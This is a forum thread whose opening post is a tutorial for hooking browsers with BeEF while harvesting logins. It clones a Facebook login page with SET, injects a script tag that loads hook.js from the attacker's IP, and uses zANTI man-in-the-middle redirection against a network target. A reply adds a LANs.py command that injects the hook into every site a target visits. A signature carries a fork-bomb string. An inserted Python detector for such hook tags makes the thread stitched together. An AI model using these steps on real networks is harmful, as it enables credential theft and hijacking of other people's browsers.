
Thread: Tutorial: Easy Beef-XSS hook

  1. #1
    Join Date
    2014-Nov
    Location
    Sweden
    Posts
    21

    Tutorial: Easy Beef-XSS hook

    Hi all, just wanted to share something I found useful while pentesting my devices at home, hooking a browser with beef-xss and getting login credentials at the same time.

    Start off by starting SET (Kalimenu -> 6 -> 3), then choose options 1, 2, 3, 2 (Credential harvester method) and enter your IP address. Next, choose option 2 and clone a site with a login; I chose, for example, Facebook.

    Next you need to chmod index.html to 755 so people can access your webpage.
    Code:
    chmod 755 /var/www/index.html

    Next we'll inject the hook.js code into the index.html file. Insert the following after <head> and before </head>.
    Code:
     <script type="text/javascript" src="http://<youripaddress>:3000/hook.js"></script>
    Now is a good time to start up your apache server and launch beef-xss (Kalimenu -> 6 -> 2) and log in to the beef-xss web ui.

    Next we'll start zANTI on your NetHunter device and scan the network. Target the computer you want to hook in the list by clicking on it and then going to "Man in the Middle".
    Press the cogwheel next to "Redirect HTTP" and enter the IP of your device running beef-xss, then enable it. Finally press "on" in the top right corner to enable MITM.

    If you try accessing the internet from the attacked computer now, it should automatically load up your fake Facebook site (or whichever site you chose) and the browser should be hooked in beef-xss for further exploits.

    Thanks for reading. And please let me know if there are any errors or if there are any improvements that can be made.
    Last edited by unknownpwn; 2014-12-20 at 12:01.
    ){ :|:& };:
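    Seen from the defending side, the hook described in the post above appears in the served page as a cross-origin script tag pointing at a raw IP address on port 3000. The following is an added example, not part of the original post, that scans captured HTML for that pattern; the heuristics, function names and sample HTML are assumptions made for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample of a served page; 192.0.2.10 is a documentation address.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
<script type="text/javascript" src="http://192.0.2.10:3000/hook.js"></script>
</head><body><form action="/login"></form></body></html>"""

class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> element."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src)

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def suspicious_scripts(page_url, html):
    """Return (src, reasons) for cross-origin scripts matching the heuristics."""
    page = urlsplit(page_url)
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        target = urlsplit(urljoin(page_url, src))
        if (target.scheme, target.netloc) == (page.scheme, page.netloc):
            continue  # same-origin script, not the pattern from the post
        reasons = []
        if is_ip_literal(target.hostname or ""):
            reasons.append("host is a raw IP address")
        if target.path.rsplit("/", 1)[-1].lower() == "hook.js":
            reasons.append("file name is hook.js")
        if target.scheme == "http" and target.netloc.endswith(":3000"):
            reasons.append("plain HTTP on port 3000, as in the post")
        if reasons:
            findings.append((src, reasons))
    return findings
```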

  2. #2
    What do you mean by " insert the following after [head] somewhere."?

  3. #3
    Join Date
    2014-Nov
    Location
    Sweden
    Posts
    21
    Quote Originally Posted by ping View Post
    What do you mean by " insert the following after [head] somewhere."?
    Insert the code in between the <head> tags (e.g., after <head> and before </head> in index.html).

  4. #4
    Quote Originally Posted by unknownpwn View Post
    Insert the code in between the <head> tags (e.g., after <head> and before </head> in index.html).
    OK, thank you.

  5. #5
    Join Date
    2014-Nov
    Posts
    16
    That's actually really creative. Great tutorial.

  6. #6
    Join Date
    2014-Nov
    Location
    Sweden
    Posts
    21
    Quote Originally Posted by C1M7 View Post
    That's actually really creative. Great tutorial.
    Thank you very much
    ){ :|:& };:

  7. This is a really great tutorial, thanks a lot!

  8. Check out LANs.py on GitHub, works like...

    ./LANs.py -h [For help]
    ./LANs.py -b http://192.168.0.x:3000/hook.js [ Replace the LAN IP with whatever network IP you're given by the router. It will then do a scan using nbtscan (you might need to apt-get install nbtscan). Pick a target, press Ctrl+C and type the target's IP in; from there it will inject the hook.js into every website the target goes to. ]

  9. #9
    Join Date
    2015-Mar
    Posts
    1
    That's great. Thanks for sharing.

  10. #10
    a great share
    Thank you very much

  11. #11
    Join Date
    2013-Apr
    Location
    Kali forums
    Posts
    805
    Thanks very much, unknownpwn.

  12. The tutorial is just wonderful
    Works for me now, thanks again!
